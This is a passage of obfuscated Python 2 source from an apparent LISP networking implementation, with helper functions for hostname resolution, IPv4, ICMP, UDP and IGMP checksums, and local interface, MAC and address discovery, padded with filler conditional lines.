o0o00O0oOooO0 . store_address ( addr_str )
return ( o0o00O0oOooO0 )
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if 48 - 48: iII111i + IiII
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
def lisp_gethostbyname ( string ) :
ooOo000OoO0o = string . split ( "." )
ooooo0O0 = string . split ( ":" )
i1III1iI = string . split ( "-" )
if 38 - 38: iIii1I11I1II1 / ooOoO0o
if ( len ( ooOo000OoO0o ) == 4 ) :
if ( ooOo000OoO0o [ 0 ] . isdigit ( ) and ooOo000OoO0o [ 1 ] . isdigit ( ) and ooOo000OoO0o [ 2 ] . isdigit ( ) and
ooOo000OoO0o [ 3 ] . isdigit ( ) ) : return ( string )
if 13 - 13: iIii1I11I1II1
if ( len ( ooooo0O0 ) > 1 ) :
try :
int ( ooooo0O0 [ 0 ] , 16 )
return ( string )
except :
pass
if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if ( len ( i1III1iI ) == 3 ) :
for iIi1I1 in range ( 3 ) :
try : int ( i1III1iI [ iIi1I1 ] , 16 )
except : break
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
try :
o0o00O0oOooO0 = socket . gethostbyname ( string )
return ( o0o00O0oOooO0 )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
try :
o0o00O0oOooO0 = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( o0o00O0oOooO0 [ 3 ] != string ) : return ( "" )
o0o00O0oOooO0 = o0o00O0oOooO0 [ 4 ] [ 0 ]
except :
o0o00O0oOooO0 = ""
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
return ( o0o00O0oOooO0 )
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
ooooo0Oo0 = binascii . hexlify ( data )
if 97 - 97: IiII . oO0o . IiII
if 91 - 91: OOooOOo + I1Ii111 . I11i
if 15 - 15: I11i
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
oO0oOoo0O = 0
for iIi1I1 in range ( 0 , hdrlen * 2 , 4 ) :
oO0oOoo0O += int ( ooooo0Oo0 [ iIi1I1 : iIi1I1 + 4 ] , 16 )
if 26 - 26: Oo0Ooo + I1IiiI * OOooOOo + ooOoO0o
if 88 - 88: I11i + i11iIiiIii % oO0o * OOooOOo * OOooOOo * Ii1I
if 24 - 24: ooOoO0o / iII111i + IiII . IiII
if 39 - 39: ooOoO0o + O0 / i1IIi % IiII / oO0o * IiII
if 77 - 77: IiII . I1Ii111 % OoOoOO00
oO0oOoo0O = ( oO0oOoo0O >> 16 ) + ( oO0oOoo0O & 0xffff )
oO0oOoo0O += oO0oOoo0O >> 16
oO0oOoo0O = socket . htons ( ~ oO0oOoo0O & 0xffff )
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
oO0oOoo0O = struct . pack ( "H" , oO0oOoo0O )
ooooo0Oo0 = data [ 0 : 10 ] + oO0oOoo0O + data [ 12 : : ]
return ( ooooo0Oo0 )
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
i111i1I1ii1i = binascii . hexlify ( data )
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
oO0oOoo0O = 0
for iIi1I1 in range ( 0 , 36 , 4 ) :
oO0oOoo0O += int ( i111i1I1ii1i [ iIi1I1 : iIi1I1 + 4 ] , 16 )
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
oO0oOoo0O = ( oO0oOoo0O >> 16 ) + ( oO0oOoo0O & 0xffff )
oO0oOoo0O += oO0oOoo0O >> 16
oO0oOoo0O = socket . htons ( ~ oO0oOoo0O & 0xffff )
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
oO0oOoo0O = struct . pack ( "H" , oO0oOoo0O )
i111i1I1ii1i = data [ 0 : 2 ] + oO0oOoo0O + data [ 4 : : ]
return ( i111i1I1ii1i )
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
def lisp_udp_checksum ( source , dest , data ) :
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
OO0o0OO0 = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
o0 = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
iIIIIi = socket . htonl ( len ( data ) )
i1I11ii = socket . htonl ( LISP_UDP_PROTOCOL )
o0ooO00O0O = OO0o0OO0 . pack_address ( )
o0ooO00O0O += o0 . pack_address ( )
o0ooO00O0O += struct . pack ( "II" , iIIIIi , i1I11ii )
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
oOoO0OOO00O = binascii . hexlify ( o0ooO00O0O + data )
OOOOO0o0OOo = len ( oOoO0OOO00O ) % 4
for iIi1I1 in range ( 0 , OOOOO0o0OOo ) : oOoO0OOO00O += "0"
if 40 - 40: IiII * oO0o % I11i * I1ii11iIi11i
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
if 41 - 41: IiII
oO0oOoo0O = 0
for iIi1I1 in range ( 0 , len ( oOoO0OOO00O ) , 4 ) :
oO0oOoo0O += int ( oOoO0OOO00O [ iIi1I1 : iIi1I1 + 4 ] , 16 )
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
if 10 - 10: II111iiii . O0
if 31 - 31: oO0o / i11iIiiIii / O0
if 39 - 39: I1IiiI + Oo0Ooo
if 83 - 83: i1IIi
oO0oOoo0O = ( oO0oOoo0O >> 16 ) + ( oO0oOoo0O & 0xffff )
oO0oOoo0O += oO0oOoo0O >> 16
oO0oOoo0O = socket . htons ( ~ oO0oOoo0O & 0xffff )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
oO0oOoo0O = struct . pack ( "H" , oO0oOoo0O )
oOoO0OOO00O = data [ 0 : 6 ] + oO0oOoo0O + data [ 8 : : ]
return ( oOoO0OOO00O )
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
def lisp_igmp_checksum ( igmp ) :
i11ii = binascii . hexlify ( igmp )
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
oO0oOoo0O = 0
for iIi1I1 in range ( 0 , 24 , 4 ) :
oO0oOoo0O += int ( i11ii [ iIi1I1 : iIi1I1 + 4 ] , 16 )
if 45 - 45: OoooooooOO
if 9 - 9: I11i . OoO0O00 * i1IIi . OoooooooOO
if 32 - 32: OoOoOO00 . I1ii11iIi11i % I1IiiI - II111iiii
if 11 - 11: O0 + I1IiiI
if 80 - 80: oO0o % oO0o % O0 - i11iIiiIii . iII111i / O0
oO0oOoo0O = ( oO0oOoo0O >> 16 ) + ( oO0oOoo0O & 0xffff )
oO0oOoo0O += oO0oOoo0O >> 16
oO0oOoo0O = socket . htons ( ~ oO0oOoo0O & 0xffff )
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
oO0oOoo0O = struct . pack ( "H" , oO0oOoo0O )
igmp = igmp [ 0 : 2 ] + oO0oOoo0O + igmp [ 4 : : ]
return ( igmp )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
def lisp_get_interface_address ( device ) :
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
if 93 - 93: Oo0Ooo / I1ii11iIi11i + i1IIi * oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
IIiiI = netifaces . ifaddresses ( device )
if ( IIiiI . has_key ( netifaces . AF_INET ) == False ) : return ( None )
if 36 - 36: iII111i
if 52 - 52: I1Ii111 % O0 . i1IIi . OoooooooOO
if 33 - 33: OOooOOo % II111iiii
if 71 - 71: Ii1I * I1Ii111 % II111iiii . Ii1I % OoO0O00 + I1ii11iIi11i
o0oOo0OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
for o0o00O0oOooO0 in IIiiI [ netifaces . AF_INET ] :
oo0o00OO = o0o00O0oOooO0 [ "addr" ]
o0oOo0OO . store_address ( oo0o00OO )
return ( o0oOo0OO )
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
return ( None )
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
def lisp_get_input_interface ( packet ) :
I1iI1I1ii1 = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
iIIi1 = I1iI1I1ii1 [ 0 : 12 ]
o0Ooo0o0Oo = I1iI1I1ii1 [ 12 : : ]
if 55 - 55: iIii1I11I1II1 * iII111i
try : oo = lisp_mymacs . has_key ( o0Ooo0o0Oo )
except : oo = False
if 30 - 30: O0 + OOooOOo % Oo0Ooo . i1IIi
if ( lisp_mymacs . has_key ( iIIi1 ) ) : return ( lisp_mymacs [ iIIi1 ] , o0Ooo0o0Oo , iIIi1 , oo )
if ( oo ) : return ( lisp_mymacs [ o0Ooo0o0Oo ] , o0Ooo0o0Oo , iIIi1 , oo )
return ( [ "?" ] , o0Ooo0o0Oo , iIIi1 , oo )
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
if 77 - 77: i1IIi + OoO0O00 . I1IiiI * OOooOOo / IiII / Ii1I
if 84 - 84: OoO0O00 / iIii1I11I1II1
if 33 - 33: i1IIi / I1Ii111 - i1IIi . Oo0Ooo
if 18 - 18: Oo0Ooo / O0 + iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
def lisp_get_local_interfaces ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
II1i = lisp_interface ( OoO0o0OOOO )
II1i . add_interface ( )
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
return
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
def lisp_get_loopback_address ( ) :
for o0o00O0oOooO0 in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( o0o00O0oOooO0 [ "peer" ] == "127.0.0.1" ) : continue
return ( o0o00O0oOooO0 [ "peer" ] )
if 40 - 40: o0oOOo0O0Ooo + I11i
return ( None )
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
def lisp_is_mac_string ( mac_str ) :
i1III1iI = mac_str . split ( "/" )
if ( len ( i1III1iI ) == 2 ) : mac_str = i1III1iI [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_macs ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
o0 = OoO0o0OOOO . replace ( ":" , "" )
o0 = OoO0o0OOOO . replace ( "-" , "" )
if ( o0 . isalnum ( ) == False ) : continue
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
if 37 - 37: iII111i
if 33 - 33: OoO0O00 - O0 - OoO0O00
if 94 - 94: IiII * I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - o0oOOo0O0Ooo
try :
I1I1i = netifaces . ifaddresses ( OoO0o0OOOO )
except :
continue
if 45 - 45: OOooOOo
if ( I1I1i . has_key ( netifaces . AF_LINK ) == False ) : continue
i1III1iI = I1I1i [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
i1III1iI = i1III1iI . replace ( ":" , "" )
if 25 - 25: OOooOOo % O0
if 44 - 44: I1Ii111 . Ii1I * II111iiii / IiII + iIii1I11I1II1
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
if ( len ( i1III1iI ) < 12 ) : continue
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if ( lisp_mymacs . has_key ( i1III1iI ) == False ) : lisp_mymacs [ i1III1iI ] = [ ]
lisp_mymacs [ i1III1iI ] . append ( OoO0o0OOOO )
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
def lisp_get_local_rloc ( ) :
II1IIiiI1 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
II1IIiiI1 = II1IIiiI1 . split ( "\n" ) [ 0 ]
OoO0o0OOOO = II1IIiiI1 . split ( ) [ - 1 ]
if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
o0o00O0oOooO0 = ""
O00 = lisp_is_macos ( )
if ( O00 ) :
II1IIiiI1 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0o0OOOO ) )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0o0OOOO )
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if ( II1IIiiI1 == "" ) :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "global lo"'
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if 86 - 86: ooOoO0o
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
o0o00O0oOooO0 = ""
II1IIiiI1 = II1IIiiI1 . split ( "\n" )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
for oOOo0ooO0 in II1IIiiI1 :
oO0OO = oOOo0ooO0 . split ( ) [ 1 ]
if ( O00 == False ) : oO0OO = oO0OO . split ( "/" ) [ 0 ]
ii1i1II11II1i = lisp_address ( LISP_AFI_IPV4 , oO0OO , 32 , 0 )
return ( ii1i1II11II1i )
if 95 - 95: I11i + o0oOOo0O0Ooo * I1ii11iIi11i
return ( lisp_address ( LISP_AFI_IPV4 , o0o00O0oOooO0 , 32 , 0 ) )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
if 38 - 38: I11i . I11i * oO0o / OoooooooOO % ooOoO0o
if 80 - 80: OoO0O00 / IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 22 - 22: oO0o * iII111i
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO
O0O0 = None
ooo = 1
oO0oo = os . getenv ( "LISP_ADDR_SELECT" )
if ( oO0oo != None and oO0oo != "" ) :
oO0oo = oO0oo . split ( ":" )
if ( len ( oO0oo ) == 2 ) :
O0O0 = oO0oo [ 0 ]
ooo = oO0oo [ 1 ]
else :
if ( oO0oo [ 0 ] . isdigit ( ) ) :
ooo = oO0oo [ 0 ]
else :
O0O0 = oO0oo [ 0 ]
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
ooo = 1 if ( ooo == "" ) else int ( ooo )
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
ooOOo = [ None , None , None ]
i1iii1IiiiI1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IIIiI1i1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
IIi11iII11i1 = None
if 5 - 5: II111iiii - IiII
for OoO0o0OOOO in netifaces . interfaces ( ) :
if ( O0O0 != None and O0O0 != OoO0o0OOOO ) : continue
IIiiI = netifaces . ifaddresses ( OoO0o0OOOO )
if ( IIiiI == { } ) : continue
if 86 - 86: IiII * I11i + O0 * I1Ii111 + i11iIiiIii - I1ii11iIi11i
if 70 - 70: i11iIiiIii
if 57 - 57: I11i % OOooOOo + ooOoO0o * Ii1I . Oo0Ooo
if 78 - 78: OoooooooOO / i1IIi . OOooOOo
IIi11iII11i1 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 88 - 88: I11i + I1IiiI - I11i / OoooooooOO - i11iIiiIii
if 24 - 24: iIii1I11I1II1
if 89 - 89: Ii1I / i1IIi - o0oOOo0O0Ooo % I1IiiI . Oo0Ooo - O0
if 71 - 71: OoO0O00 % I1IiiI - iII111i . iII111i
